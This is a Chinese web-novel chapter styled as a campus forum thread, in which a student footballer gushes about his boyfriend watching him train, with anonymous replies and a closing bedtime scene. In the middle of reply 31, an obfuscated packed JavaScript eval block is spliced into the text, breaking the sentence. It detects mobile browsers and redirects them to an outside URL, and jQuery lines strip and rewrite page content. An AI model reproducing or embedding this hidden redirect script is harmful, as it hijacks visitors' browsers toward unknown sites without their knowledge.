标题:【树洞】他出现在球场边的那一刻,我觉得自己是全世界最幸福的人
论坛板块:京华大学\校园生活\情感树洞
发帖人:足球不行踢球去
正文:
兄弟们。
今天我不想求助。
我只想炫耀。
炫耀一个人。
——
事情要从上周说起。
上次表哥来看展的事过去之后,我们恢复了正常的节奏。
一起吃早饭,一起去图书馆,晚上他自习我训练。
但有一个问题一直在我心里转:
他想不想看我训练?想不想看我比赛?
我从来没问过。
因为我觉得他可能不感兴趣。
你们知道的,他喜欢安静,喜欢看书,喜欢那些有文化的东西。
而我的训练呢?
一群人大呼小叫,满身臭汗,跑来跑去抢一个球。
和“文雅”这两个字,完全不沾边。
所以我从来没主动邀请过他。
我怕他觉得无聊。
怕他坐在场边,看着一群野蛮人抢球,心里想“我为什么要来”。
怕他来了之后,发现我的世界和他的世界,差得太远。
——
但我又忍不住试探。
上周有一天,吃饭的时候,我问他:“你以前看过球赛吗?”
他想了想,说:“看过。”
“看过谁的?”
“你的。”
我愣了一下。
他说:“新生杯的时候,我去看过。”
“后来也去过几次。”
“你进球的时候,旁边的人都在喊,我没喊。”
“但我挺高兴的。”
他说这话的时候,语气很平淡,像在说今天天气不错。
但我听得心跳漏了一拍。
他去看过我的比赛。
不止一次。
他坐在看台上,看我跑来跑去,看我进球。
他没喊,但他挺高兴的。
我问他:“你怎么不告诉我?”
他看了我一眼,说:“告诉你干嘛?你踢球又不是给我看的。”
我说:“可以给你看啊。”
他没说话。
但耳朵红了。
——
后来我鼓起勇气问他:“那这周末的训练,你要不要来看?”
他想了想,说:“周末?”
“嗯,周六下午,我们队内训练赛。”
他沉默了几秒。
然后说:“我考虑一下。”
考虑一下。
这四个字让我心里打鼓。
他是不是不想来?是不是不好意思拒绝?是不是觉得来球场浪费时间?
我说:“没事,你不来也行,反正就是训练,没什么好看的。”
他看了我一眼,那眼神有点复杂。
但没说什么。
——
周六下午,训练前我在更衣室换衣服。
脑子里一直转:他会来吗?他会不会来?
手机拿出来看了八百遍,没有他的消息。
我想,算了,应该是不来了。
也是,人家一个文学院学霸,周末不看书,来看一群体育生抢球?
换我也不来。
我深吸一口气,把手机锁进柜子里。
不去想了。
专心训练。
——
训练开始半小时后,我们在做分组对抗。
我刚进了一个球,正往回跑。
余光扫到球场边的看台。
那里站着一个穿米白色毛衣的人。
阳光下,那人安安静静地站着,手里拎着什么东西。
我的心跳突然就停了半拍。
是顾辞。
他来了。
——
兄弟们,你们能想象那个画面吗?
球场上所有人都在跑,都在喊,都在抢球。
看台上稀稀拉拉坐着几个人,都是家属或者路过的人。
但他站在那儿。
穿着那件我最喜欢的米白色毛衣。
阳光从他身后照过来,把他整个人笼在一层光里。
他手里拎着一个袋子,不知道里面是什么。
他就那么站着,安安静静的。
但我知道他在看我。
他看的是我。
那一瞬间,我脑子里只有一个念头:
操。
值了。
这辈子值了。
——
比赛还在继续,我不能停下来。
但之后的时间,我整个人像打了鸡血一样。
跑得比平时快,抢得比平时凶,进球之后还会偷偷往看台瞟一眼。
每次瞟过去,都看见他在那儿。
有时候他在看球场,有时候他在看手机,有时候他好像在发呆。
但他一直没走。
就那么坐着,等着。
偶尔我跑近的时候,会和他对视一眼。
他嘴角会弯一下,很轻,但我看见了。
那个笑比阳光还亮。
——
比赛结束,我满头大汗往他那边跑。
他站起来,把那个袋子递给我。
我打开一看——
一瓶矿泉水,一瓶运动饮料,还有一条叠得整整齐齐的毛巾。
矿泉水是冰的,正好解渴。
运动饮料是补充电解质的,正好适合运动后喝。
毛巾是新的,软软的,上面还有洗衣液的香味。
我愣住了。
他耳朵红红的,脸上还是那副淡淡的表情。
但他说的话是:
“不知道你爱喝哪种,就都买了。”
“毛巾是新买的,洗过了,应该干净。”
我张了张嘴,不知道该说什么。
他看了我一眼,说:“傻站着干嘛,擦汗啊。”
我这才反应过来,拿毛巾擦脸。
毛巾软软的,香香的,擦在脸上特别舒服。
——
后来我们坐在看台上,我喝水,他看天。
我忍不住问:“你怎么想到买毛巾?”
他说:“你每次训练完,都用衣服擦汗。”
“那样不好,衣服脏,汗也擦不干净。”
“所以买了毛巾。”
我又问:“那水呢?”
他说:“你平时喝矿泉水,但运动后应该喝点电解质。”
“我不知道你喜欢什么牌子,就随便买的。”
他说的“随便”,是两瓶不同的水,一瓶冰的一瓶常温的。
这哪是随便。
这是想了又想,才准备好的。
我看着手里的毛巾,看着旁边的两瓶水,突然觉得眼眶有点酸。
我说:“顾辞。”
“嗯?”
“你是全世界最好的男朋友。”
他没说话。
只是轻轻靠在我肩膀上。
——
现在我已经回宿舍了。
那条毛巾我没舍得用,叠好放枕头边了。
两瓶水喝完了一瓶,另一瓶舍不得喝,放桌上了。
满脑子都是他站在阳光里的样子。
手里拎着袋子,安安静静等着我的样子。
我问他:“你不是说考虑一下吗?怎么直接来了?”
他说:“考虑完了,来。”
我说:“那你也不告诉我一声。”
他说:“告诉你干嘛?告诉你,你肯定紧张,影响发挥。”
我说:“那你就不怕我发挥不好?”
他看了我一眼,说:“你什么时候发挥不好过?”
我说:“那万一呢?”
他说:“万一也没事。你踢得不好也是你。”
我被他这句话堵得说不出话来。
他看我那样,嘴角弯了一下。
然后他说:“张扬。”
“嗯?”
“你今天进了三个球,我都数了。”
“第三个球特别帅。”
我愣住了。
他居然数了。
他居然记得我进了几个球。
他居然说“第三个球特别帅”。
我看着他,突然特别想亲他。
但看台上有人,没敢。
只是握紧了他的手。
——
兄弟们。
我今天真的很高兴。
比赢了市冠军还高兴。
因为那个市冠军,是我自己拿的。
但今天这个高兴,是他给我的。
那条毛巾,那两瓶水,那些话,那个笑。
全都是他给我的。
我现在觉得自己是全世界最幸福的人。
——
1楼匿名用户:
沙发!
楼主你今天不是来求助的,是来喂狗粮的!
2楼匿名用户:
妈的,我刚吃完饭,又被喂了一嘴狗粮。
楼主你是人吗???
3楼匿名用户:
我招谁惹谁了?我一个单身狗,为什么要看这个?
4楼匿名用户:
但是好好磕啊!!!
顾辞也太会了吧!!!
矿泉水、运动饮料、新毛巾!!!
这谁顶得住啊!!!
5楼匿名用户:
“不知道你爱喝哪种,就都买了”
“毛巾是新买的,洗过了”
“你踢得不好也是你”
“第三个球特别帅”
我死了!!!这什么神仙男友!!!
6楼匿名用户:
顾辞平时看起来冷冷淡淡的,怎么对楼主这么好啊!!!
又是偷看比赛,又是准备毛巾,又是数进球!!!
这不是爱是什么!!!
7楼匿名用户:
回6楼:因为他是顾辞啊。
对外人冷淡,对喜欢的人把心都掏出来。
8楼匿名用户:
楼主你上辈子拯救了银河系吧???
怎么找到这样的男朋友???
9楼楼主:
回8楼:不是我找的,是他等了我十四年。
10楼匿名用户:
回9楼:……
行吧。
又被他装到了。
11楼匿名用户:
但楼主也值得啊!
你们想想,楼主从第一帖到现在,变了多少?
从一个“我是直男”的傻子,变成了会说“你是全世界最好的男朋友”的人。
这就是双向奔赴!
12楼匿名用户:
对!
顾辞对楼主好,是因为楼主也对他好。
他们俩都值得!
13楼匿名用户:
话说回来,那条毛巾楼主真的舍不得用?
那放枕头边干嘛?闻味儿吗?
14楼楼主:
回13楼:……
要你管。
15楼匿名用户:
哈哈哈哈哈哈!
被说中了!
楼主就是闻味儿!
16楼匿名用户:
那两瓶水呢?
一瓶喝了,一瓶舍不得喝?
放桌上供着?
17楼楼主:
……
那是他给我买的。
舍不得喝怎么了?
18楼匿名用户:
没什么没什么。
理解理解。
恋爱中的人都这样。
19楼匿名用户:
我恋爱过吗?没有。
但我看楼主恋爱,感觉自己也谈了一场。
20楼匿名用户:
回19楼:真实。
这就是赛博恋爱吧。
21楼匿名用户:
楼主,你今天表白了吗?
说“你是全世界最好的男朋友”的时候,顾辞什么反应?
22楼楼主:
他耳朵红了。
然后靠我肩膀上了。
没说话。
但我知道他高兴。
23楼匿名用户:
呜呜呜呜呜!!!
这个画面我能脑补一万遍!!!
顾辞害羞的样子一定特别好看!!!
24楼匿名用户:
楼主你能不能发张照片?
我们就看一眼!
25楼楼主:
不行。
说了他的照片只能我一个人看。
26楼匿名用户:
小气鬼!
但理解。
毕竟是我们儿媳妇,得保护隐私。
27楼匿名用户:
话说回来,楼主你今天踢球的时候,是不是特别猛?
因为顾辞在看?
28楼楼主:
……是。
进了三个球。
平时训练赛最多进两个。
29楼匿名用户:
看吧!
这就是爱情的力量!
顾辞就是你的肾上腺素!
30楼匿名用户:
顾辞说“第三个球特别帅”,哪个球?怎么帅的?描述一下!
31楼楼主:
就是……我一个带球过了三个人,然后远射破门。<
;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|mgxs|t|shop|17382527|200203||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
p>其实挺普通的。
但他觉得帅。
32楼匿名用户:
“其实挺普通的”——
楼主你听听你说的话!
过了三个人叫普通??
33楼匿名用户:
这就是学霸和体育生的区别。
顾辞觉得帅,楼主觉得普通。
但顾辞觉得帅就够了!
34楼匿名用户:
对!
他觉得帅,就说明他眼里只有你。
你什么样他都觉得帅。
35楼楼主:
……
知道了。
别说了。
再说我又要傻笑了。
36楼匿名用户:
哈哈哈哈哈哈!
已经傻笑了吧?
手机屏幕都照出你的脸了!
37楼匿名用户:
楼主你现在是不是盯着那条毛巾傻笑?
38楼楼主:
……
是。
39楼匿名用户:
完了完了,这人彻底没救了。
恋爱脑晚期。
40楼匿名用户:
但这样的恋爱脑,我好羡慕啊!!!
我也想有个人让我变成恋爱脑!!!
41楼匿名用户:
回40楼:我也想。
但首先得有个顾辞这样的人喜欢我。
算了,我不配。
42楼匿名用户:
楼主,明天有什么安排?
是不是又要陪顾辞去图书馆?
43楼楼主:
嗯。
他说论文还没写完,让我去陪他。
其实就是占座,他写我看。
44楼匿名用户:
那也不错啊!
各干各的,但在一起。
这就是情侣日常。
45楼匿名用户:
记得带水!
记得带零食!
记得看他!
46楼楼主:
知道了知道了。
比我自己记得还清楚。
47楼匿名用户:
废话!
我们是赛博父母!
当然要操心!
48楼匿名用户:
对了楼主,你还没问顾辞,他怎么知道你今天有训练赛的?
你告诉他的?
49楼楼主:
我没告诉具体时间。
就说了周六下午。
50楼匿名用户:
那他自己查的?
还是之前就记住的?
51楼楼主:
我问了。
他说:“你上周说周六下午训练赛,我记住了。”
52楼匿名用户:
啊啊啊啊啊!!!
“我记住了”!!!
这是什么绝世好男友!!!
53楼匿名用户:
就随口说了一句,他记了一周。
然后默默准备好东西,默默出现在球场边。
这是什么偶像剧剧情!!!
54楼匿名用户:
楼主你确定你是直男?
你确定不是你追的他?
55楼楼主:
……
是我先表白的。
但他等了我十四年。
所以算双向奔赴吧。
56楼匿名用户:
双向奔赴这个词,用在这儿真合适。
他等你十四年,你终于开窍。
然后他用行动告诉你,等你是值得的。
57楼匿名用户:
呜呜呜,我又哭了。
这帖子从第一集追到现在,太不容易了。
58楼匿名用户:
所以楼主,你现在什么感觉?
有没有觉得特别幸福?
59楼楼主:
有。
特别幸福。
幸福到有时候觉得不真实。
怕一觉醒来,发现是梦。
60楼匿名用户:
不是梦。
是真的。
你发帖子我们都看见了。
顾辞给你买毛巾我们都知道了。
你进三个球我们都数了。
61楼匿名用户:
对!
这些都是真的。
所以你要好好珍惜。
好好对他。
62楼楼主:
嗯。
我会的。
这辈子就他了。
63楼匿名用户:
行了行了,别说了。
再说我又要哭了。
今天狗粮吃太饱,睡觉了。
64楼楼主:
好。
晚安。
谢谢你们。
——
【最后的最后】
张扬躺在床上,手里拿着那条毛巾。
软软的,香香的。
他想起顾辞站在阳光里的样子。
想起顾辞把毛巾递给自己的样子。
想起顾辞说“第三个球特别帅”时,眼睛亮亮的样子。
手机震了一下。
【圆圆】:睡了?
【张】:没。
【圆圆】:在想什么?
【张】:在想你。
【圆圆】:……
【张】:在想你今天给我买毛巾买水,站在球场边等我的样子。
【张】:顾辞。
【圆圆】:嗯?
【张】:你今天特别好看。
【张】:比阳光还好看。
【圆圆】:……
【圆圆】:张扬。
【张】:嗯?
【圆圆】:你今天踢球的时候,也特别好看。
【圆圆】:尤其是第三个球。
【张】:你不是说过了吗?
【圆圆】:再说一遍不行吗?
我盯着那行字,笑了。
笑得像个傻子。
然后我打字:
【张】:行。
【张】:你说多少遍都行。
【张】:我记着。
【张】:这辈子都记着。
【圆圆】:嗯。
【圆圆】:晚安,张扬。
【张】:晚安。
——
窗外有月光。
很亮。
张扬把毛巾贴在脸上,闭上眼睛。
是顾辞给自己买的毛巾。
是顾辞站在阳光里等自己的那天。
是他说的那句“第三个球特别帅”。
全都是他。
全都是。